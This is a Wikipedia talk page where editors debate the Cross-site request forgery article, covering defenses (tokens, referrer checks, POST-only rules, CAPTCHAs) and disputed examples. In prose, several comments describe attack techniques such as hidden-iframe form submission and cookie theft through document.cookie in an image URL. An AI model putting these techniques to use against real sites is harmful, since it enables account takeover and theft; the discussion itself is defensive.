Nothing Special   »   [go: up one dir, main page]

Jump to content

Talk:Cross-site request forgery

Page contents not supported in other languages.
From Wikipedia, the free encyclopedia

High-Impact CSRF Examples

[edit]

Hey guys. In 2008 I published a technical report describing CSRF vulnerabilities in four popular sites (ING Direct, YouTube, The NYTimes and Metafilter). The ING Direct attack was particularly interesting because it allowed money to be transferred out of a bank account using a pure CSRF attack (which is the first such attack of which I'm aware). This CSRF article is strong as-is, but might be stronger if the main example (which uses a bank) were a real example and not a toy example. Regardless, I felt uncomfortable changing the text of the article to include content I've written, so I've decided to simply point to the paper and blog post here--use it as you wish.

- Bill Zeller —Preceding unsigned comment added by 24.215.164.121 (talk) 03:11, 25 May 2010 (UTC)[reply]

I agree, I'll add a reference to your publication. The eBay example is most likely not even a CSRF attack so I'll replace it with a proper one described in your publication. 81.11.234.113 (talk) 15:28, 29 May 2015 (UTC)[reply]

GET vs POST

[edit]

"Also, making the server accept POST requests only instead of GET requests will make such attacks harder."

Back in the days of Mosaic and Netsape 1, yes. Since Netscape 2, no. It is trivial to call JavaScript's form.submit() on a POST form in a hidden (i)frame. Removing this enduring myth.

NeilFraser 23:27, 5 April 2006 (UTC)[reply]

POST does make it somewhat harder to exploit this. For example, you wouldnt't be able to do the image-trick mentioned above in the article on sites which scrubs javascript from user intput if you required POST requests. I.e., by preventing XSS and requiring POST, you will block that particular XSRF attack vector. So while I agree that POST is not the solution, it will make it less trivial to exploit XSRF issues on most sites where people contribute content.

Olekasper 08:10, 10 August 2006 (UTC)[reply]

I think this page should clarify something a little: If your site is susceptible to XSS (Cross-Site Scripting) then neither requiring POST requests or performing transient authentication (described in 1st paragraph) will protect you. Using JavaScript you can execute a POST request to circumvent the POST requirement. To circumvent transient authentication you can use JavaScript to download a page, look for the secret token to send along with your malicious request and send the malicious request along with the secret token.

If you close the XSS hole on your site then either one of the above methods will close the XSRF hole.

Some more detail on why requiring POST is secure: If the user clicks a link or views an image on another site then it will issue a GET request which will be ignored. On another site JavaScript cannot be used to execute a POST request because of SOP (Same-Origin Policy). This means that if the JavaScript executed on site1.example.com then it cannot make a POST request to site2.example.com.

I'm sure that this needs to be cited in some source somewhere. Anybody know of one?

Please correct me if I'm wrong.

Sjbotha (talk) 19:10, 27 November 2007 (UTC)[reply]

"On another site JavaScript cannot be used to execute a POST request because of SOP (Same-Origin Policy)." That statement is wrong. Javascript can be used to submit a form which POSTs to another site and it is trivial to do so. It can even be done without Javascript, by tricking the user into clicking on something. This is not what the same origin policy covers. See also NeilFraser's comment above. 210.84.45.67 (talk) 03:02, 15 November 2008 (UTC)[reply]

GET request should NEVER be able to change state according to the HTTP specifications!!! See this spec. Therefore anyone following the spec will never have to make this decision. 81.11.234.113 (talk) 16:03, 29 May 2015 (UTC)[reply]

CAPTCHAs

[edit]

CAPTCHAs create major usability issues and depending on the implementation, may still be vulnerable to CSRF attacks using iframes. CAPTCHAs are better at solving other problems, like bots and spam. Hidden form fields are the standard CSRF defense, and very effective assuming the browser is free of vulnerabilities and the site is free of cross-site scripting vulnerabilities. (These assumptions are reasonable because if they were not true, the attacker is unlikely to bother with CSRF as there are much easier attacks.)

Rulesdoc 20:57, 18 October 2006 (UTC)[reply]

"A common approach is to include a secret, user-specific token in forms that is verified in addition to the cookie. This approach doesn't save you against the most malicious of attackers, as the attacker can use XMLHttpRequest to grab the one-time token in the background and then stuff it into the POST."

As written, this is misleading. XHR is subject to the same-domain security model, therefore this particular scenario is only possible in combination with XSS.
Naturally any XSS attack can work around CSRF protection. I'm reverting the above change away. --NikolasCo 22:26, 22 October 2006 (UTC)[reply]
Thank you. Rulesdoc 03:44, 24 October 2006 (UTC)[reply]

Gmail exploit

[edit]

Is the Gmail exploit from 1 January 2007 an accurate example of a cross-site request forgery? It doesn't match the description of CSRF from this article (there are no side effects of showing contacts list, the user is not authorizing an action). It doesn't fit neatly into the XSS category either. I'm removing the reference for now but please add it back if I'm mistaken. Rulesdoc 07:14, 2 January 2007 (UTC)[reply]

I think it is CSRF, because it's clearly not XSS, and surely theft of a contact list is a side effect. You are right that it doesn't change server state, but I think that like XSS, CSRF has a number of different twists and turns. I've added back in the later paragraphs which had nothing to do with GMail and where about an alternate protection method (double-submit-cookies). Should I add the GMail stuff back in again? JoeWalker 22:48, 2 January 2007 (UTC)[reply]

Sorry about reverting away your other edits. I'd like to get some more opinions on the name for the Gmail exploit. It seems like this is an example of exploiting an inadequate JSON authentication scheme, neither CSRF or XSS. Normally in CSRF, you don't have access to the response (and don't need access to it), it's the request that matters -- but for the Gmail exploit, the response is really important. If the contacts list data were in XML instead of JSON, there would be no attack. Rulesdoc 08:19, 5 January 2007 (UTC)[reply]

HTTPS

[edit]

66.8.130.129, while it's true that HTTPS is a useful tool for web applications, the problems that it solves are orthogonal to CSRF attacks. HTTPS is unnecessary or impossible for many applications (e.g. router web administration tools), yet these are often the apps most vulnerable to CSRF and easily protected by the techniques described in this article. Discussion of HTTPS would be better suited for an article on general best practices for web security. Rulesdoc 21:44, 5 January 2007 (UTC)[reply]

Name Fragmentation / Dilution

[edit]

I would like to remove the reference to reverse cross-site request, because it's yet another attempt to rename CSRF, and it's based on a fundamental misunderstanding of what CSRF is. If you read the description, the name RCSR is being used to describe the use of a XSS vulnerability to launch a standard CSRF attack. This exact technique has been used for years to exploit XSS vulnerabilities in order to silently steal cookies. (With JavaScript, create an image with a source URL that includes document.cookie in the query string.) It would be nice to remove all alternative names (XSRF, session riding, etc.), because the redirect pages are bad enough (http://simonwillison.net/2005/Jun/6/wikipedia/).

(Update: This change has been made.)

Prevention by validating referrers?

[edit]

Couldn't this issue be prevented by validating that the rerrer is from the same site? (i know the referrer can be faked, but you would have to get your victim to do this...)

or what have i misunderstood? —The preceding unsigned comment was added by 217.227.34.233 (talk) 18:57, 23 March 2007 (UTC).[reply]

Forging a victim's headers is possible with Flash: http://webappsec.org/lists/websecurity/archive/2006-07/msg00069.html —The preceding unsigned comment was added by Shiflett (talkcontribs) 13:09, 17 April 2007 (UTC).[reply]

In response to the above comment by 217.227.34.233: HTTP_REFERER is a purely optional header, so requiring it to be present by a web application is going to result in false positives for some legitimate users. For example it is sometimes blocked by firewalls as part of a privacy protection policy. --Andrew.urquhart 19:00, 28 June 2007 (UTC)[reply]

Referrers get suppressed for all sorts of legitimate reasons (e.g. connections over HTTPS). Why use referrers when hidden fields are known to work reliably? Rulesdoc 00:21, 30 July 2007 (UTC)[reply]

Another aproach is using HTTP_USER_AGENT as written in phpsec.org —Preceding unsigned comment added by 80.31.227.143 (talk) 17:16, 25 February 2009 (UTC)[reply]

I'd like to question whether the statement "The attacker must target either a site that doesn't check the “Referer” header (which is common) or a victim with a browser or plugin bug that allows referrer spoofing (which is rare)." should be there at all. It is totally irrelevant, because referrer header checking is flawed, due to the above reasons, particularly as the referrer header is never submitted with HTTPS requests, so any site that was secure enough to support HTTPS, if it checked the referrer, would block all requests. —Preceding unsigned comment added by 115.70.140.214 (talk) 11:33, 17 June 2010 (UTC)[reply]

I'd like to question this statement as well. Referer checking is a terrible defense at best unless you're going to block requests with no referer as well which would break a very significant number of legitimate clients. The only practical and meaningful answer is to actually fix it on your side with a secret token or re-prompt for credentials for every meaningful action. Anyone object to removing this limitation line? — Preceding unsigned comment added by 199.106.103.249 (talk) 23:00, 1 July 2011 (UTC)[reply]
If this statement is kept, it should be modified to clarify whether it's common for the attacker to target a site or for a site to not check the "Referrer" header. Same goes for clarifying what is rare in the second part of the sentence. Rdfiasco (talk) 20:06, 22 May 2013 (UTC)[reply]

Alice vs. Eve

[edit]

Isn't the name of the attacker usually Eve and not Alice, like it appears to be in the first couple of paragraphs? Wppds 16:29, 3 April 2007 (UTC)[reply]

See Alice and Bob for standard security archetypes. You are right in that Alice is usually the victim, not attacker. However Eve is typically a passive attacker (observing only). So in this case a different player such as Mallory or Dave may be more appropriate. - Dmeranda 18:43, 3 April 2007 (UTC)[reply]

Browsers restricting content to same IP/Domain

[edit]

From the article:

It is also suggested that browsers should isolate content on a page to other content from the same IP, or at least the same domain, by default. This would break very little of the web and solve the problem.

I take this comment to task, specifically the "break very little of the web" part: many sites use advertisements served from other IPs and domains. If browsers disabled this, these sites would have to go back to using frames to include ads from an ad server.

I am not saying whether advertisements are good or bad, just that many sites use them and browsers that "isolate content on a page to other content from the same IP or...the same domain" would break more than "very little of the web".

Also, many sites such as blogs don't host blogger provided images...they force the users to use image hosting sites such as Photo Bucket and include an img tag pointing to the outside site.

A better solution (than blocking content from outside sites) would be for the browser to not include cookies on requests to other domains (or IP addresses) while collecting content to display on this page. This stops the sending of the user's identity/authentication to the outside site, without stopping the site the user is visiting from including content from an outside site. Sorry, I don't have a Wikipedia account - Corey 01:14, 3 July 2007 (UTC)

This is starting to sound like original research (see WP:NOR). Wikipedia is not the right place for new ideas about browser redesign to make their initial debut. I've taken the discussion of browser changes out of the main article until there is a citable source for this proposal. Rulesdoc 03:21, 30 July 2007 (UTC)[reply]

Semiprotection

[edit]

See [1]:

We don't need to use TOR we use the IP address of each and every surfer that visit our testpage. You know stumbleupon? good, they just sent me 100K. All I need to do is redirect those stumblers to an iframe embedded form and Wikipedia will be littered with fake edits...

<eleland/talkedits> 18:12, 12 February 2008 (UTC)[reply]

Ajax only?

[edit]

Article: "An alternate method is to "double submit" cookies. This method only works with Ajax based requests"

Why should that be an Ajax-only feature? The method seems pretty universal. EBusiness (talk) 20:14, 26 May 2008 (UTC)[reply]

It's not Ajax-only; there are other ways to implement it. It's just most often used for Ajax, since the synchronizer token pattern doesn't really work for Ajax requests. I've set up a server-side filter before that would generate a token, setting it in a response cookie and inserting it into the page HTML. Carl.antuar (talk) 02:01, 3 March 2016 (UTC)[reply]

Help citing

[edit]

Hi. Cross-site scripting was tagged "refimprove" in February and recently cited top to bottom and needs only a couple more refs. This article looks easier to do if only because it is shorter. I am not an expert on the topic but unless there are objections am going to try, and if anyone would like to help the more the merrier. I think it is worthwhile and both articles are sources for a W3C Working Group Note which in turn is a reference for this note and work in progress. Apologies in advance if this one also turns into a long series of tiny edits by the way (XSS took about two weeks, twice what I estimated). —SusanLesch (talk) 07:45, 11 June 2008 (UTC)[reply]

[edit]

Hi. In case anyone needs them here's the list of external links. OK from my point of view to restore them. —SusanLesch (talk) 19:26, 3 July 2008 (UTC)[reply]

Today on Slashdot

[edit]

http://rss.slashdot.org/~r/Slashdot/slashdot/~3/X1GdZ11zk78/article.pl

Might be worth a read. Shinobu (talk) 12:12, 30 September 2008 (UTC)[reply]

"known ... since the 1990s"?

[edit]

The footnote for the phrase "known and in some cases exploited since the 1990s" mentions no attacks prior to 2005. The phrase was coined in 2001 (http://www.tux.org/~peterw/csrf.txt. http://seclists.org/bugtraq/2001/Jun/0217.html, etc.), so I don't see how that footnote supports the contention that CSRF was known and exploited since the 1990s. Sure, the problem has been around since the 1990s, but I'm not aware of anyone recognizing it before 2001. —Preceding unsigned comment added by 206.112.178.116 (talk) 13:45, 30 September 2008 (UTC)[reply]

What about this?

[edit]

It is said, that including a secret in every form is a method that PREVENTS the attack. I'm not sure about that. The method is perfectly clear to me. Foreign pages generate the malicious request, which sends the cookie in the request header, but they don't have access to the secret. The secret string method uses the assumption that only the original pages generated by the server have access to the secret. BUT, it is enough, that there is a single page accessible without a secret, leading to the action being protected, for the security to be breached. Provided JavaScript is enabled, an attacker can load the page to an iframe and then submit consequential forms, all having the secret in them, which would lead the attacker to the action being protected.

Example:

1. Attacker loads www.server.com/page1.php to a hidden iframe. [with the GET method]
2. The page contains a form WITH THE SECRET, that can be submitted to the server.

Step 2 can be reiterated to go through all the secret-protected forms.

I'd appreciate a correction if I am mistaken. If I'm not, however, it might be a good idea to indicate this behavior on the page.

Wadim.grasza (talk) 17:45, 21 October 2008 (UTC)[reply]

I think the attacker can load the form into a hidden iframe, but cannot do anything to submit the form. Javascript on the attacker's page can't access any content inside the iframe because it was sourced from a different domain, so it can't read anything in that iframe, or take any action on form controls in that iframe, due to same origin policy. The attacker would be limited to loading it in an iframe and hoping that the victim accidentally clicks in the iframe himself. 210.84.45.67 (talk) 03:14, 15 November 2008 (UTC)[reply]
As I understand it, the attacker would be able to submit the form in the IFRAME, but would not be able to populate it first; it would be blank. So if there is proper form validation, then there shouldn't be any issue.Carl.antuar (talk) 02:38, 27 July 2015 (UTC)[reply]

Example and Prevention merit elaboration

[edit]

I have been trying to grok CSRF for a while now; the first time I tried to learn it from this page, I failed. Somebody just explained it to me, so I went back to check whether his explanation agrees with this article. It does, but the article is too brief. It suffers from the "we omit the subscript when it's clear" problem, for me. I hope to elaborate the Example and Prevention sections to be clear about which parties with which motivations take which actions. See also How to evaluate Web Applications security designs? written in preparation for a meeting next week. DanConnolly (talk) 16:36, 5 December 2008 (UTC)[reply]

Use different browsers

[edit]

I use Firefox bundled with NoScript and CookieSafe to do general browsing and Galeon to do my banking - note that Galeon is configured to go through a proxy (Squid) that allows only a limited number of trusted sites to be accessed (allow list) - when I'm done banking I close the browser. Since CSRF risk is high and there is little we can do right now, I prefer this approach just to be on the safe side. —Preceding unsigned comment added by 154.5.47.33 (talk) 16:18, 30 June 2009 (UTC)[reply]

Intra-site request forgery

[edit]

For platform websites that allow user-submitted content (including javascript) to be embedded on the page (such as user-submitted comments), a request forgery may be intra-site. Many of the techniques discussed under "Prevention" rely on cross-domain browser security, so those prevention techniques arent sufficient for platform sites.

For platform sites, the "secret user-specific token" has to stay secret from the browser. So the value that is sent to the browser needs to be hashed with a value unique to the form (for instance, the target url of the form). Allowing user-submitted javascript on the same page as a sensitive form will potentially expose that form to attack... but using this technique vastly limits the platform's exposure. —Preceding unsigned comment added by 216.16.251.150 (talk) 17:44, 23 April 2010 (UTC)[reply]

Django?

[edit]

The article says:

Verifying that the request's header contains a X-Requested-With. This protection used by Ruby on Rails and Django (Web framework) has been proven unsecure under a combination of browser plugins and redirects which can allow an attacker to provide custom HTTP headers on a request to any website, hence allow a forged requests

Somebody who understands this stuff better than I do should check me on this, but I think it's correct to say:

...This protection used by Ruby on Rails and Django (Web framework) prior to version 1.2.5, has been proven unsecure ...

"Javascript hijacking"

[edit]

This is now called XSSI. See Talk:JavaScript#.22Javascript_hijacking.22 — Preceding unsigned comment added by Tychay (talkcontribs) 21:56, 16 May 2012 (UTC)[reply]

Incorrect Example

[edit]

In the "Background" section, the following is used as an example of a CSRF:

"Customers of a bank in Mexico were attacked in early 2008 with an image tag in email. The link in the image tag changed the DNS entry for the bank in their ADSL router to point to a malicious website impersonating the bank."

This is in fact not a CSRF attack, but a DNS cache poisoning attack. I didn't want to outright delete a cited "example," but this should probably be taken out and replaced with a correct and more detailed example.

Alternatively, it's possible that the malicious website which was injected into the DNS cache may have used a CSRF attack by forwarding users' credentials to the real site when they "log in" on the fake one, then submitting a malicious request once users were known to be logged in for real. If this is the case, this aspect of the attack should be made more clear. Right now the entry is confusing and unrelated to the topic. — Preceding unsigned comment added by 184.74.161.61 (talk) 14:43, 21 June 2012 (UTC)[reply]

Origin header safety

[edit]

On 11 September 2012‎, Hydrox has changed

"Verifying that the request's header contains a X-Requested-With […] has been proven unsecure"

to

"Verifying that the request's header contains a X-Requested-With or checking the HTTP Referer header and/or HTTP Origin […] has been proven unsecure"

But i don't see in the 2 links provided where the Origin header is mentioned. And other good sites on security like https://code.google.com/p/browsersec/wiki/Part3#Origin_headers and https://code.google.com/p/html5security/wiki/CrossOriginRequestSecurity doesn't say anything about a Origin header spoofing.

Is there a real source to substantiate this claim ? Or is it infered from the sentence of the django blog "can allow an attacker to provide custom HTTP headers on a request to any website". Is this case, it depends how you define "custom". Is it "you can customize all http headers" or "you can add a custom http header", meaning headers not handled by the browsers like all the X-... (X-Requested-With).

Both interpretations make sense to me. — Preceding unsigned comment added by Acoudeyras (talkcontribs) 15:42, 2 October 2013 (UTC)[reply]

[edit]

Hello fellow Wikipedians,

I have just modified 2 external links on Cross-site request forgery. Please take a moment to review my edit. If you have any questions, or need the bot to ignore the links, or the page altogether, please visit this simple FaQ for additional information. I made the following changes:

When you have finished reviewing my changes, you may follow the instructions on the template below to fix any issues with the URLs.

This message was posted before February 2018. After February 2018, "External links modified" talk page sections are no longer generated or monitored by InternetArchiveBot. No special action is required regarding these talk page notices, other than regular verification using the archive tool instructions below. Editors have permission to delete these "External links modified" talk page sections if they want to de-clutter talk pages, but see the RfC before doing mass systematic removals. This message is updated dynamically through the template {{source check}} (last update: 5 June 2024).

  • If you have discovered URLs which were erroneously considered dead by the bot, you can report them with this tool.
  • If you found an error with any archives or the URLs themselves, you can fix them with this tool.

Cheers.—InternetArchiveBot (Report bug) 20:44, 14 August 2017 (UTC)[reply]

CSRF and REST without a browser

[edit]

I'm not clear, from reading this article, if CSRF is an issue with a non-browser based RESTful service. With a browser, a _csrf token can be submitted in a web form, but with a RESTful service, there's no browser. It's not clear if this means a _csrf token won't help, or if it won't be necessary. Is CSRF still a problem with a non-browser based service? The article should address this issue. —MiguelMunoz (talk) 17:28, 7 January 2021 (UTC)[reply]

ស្តេច សេដ

[edit]

SOK NA SAD 36.37.142.102 (talk) 20:44, 22 January 2024 (UTC)[reply]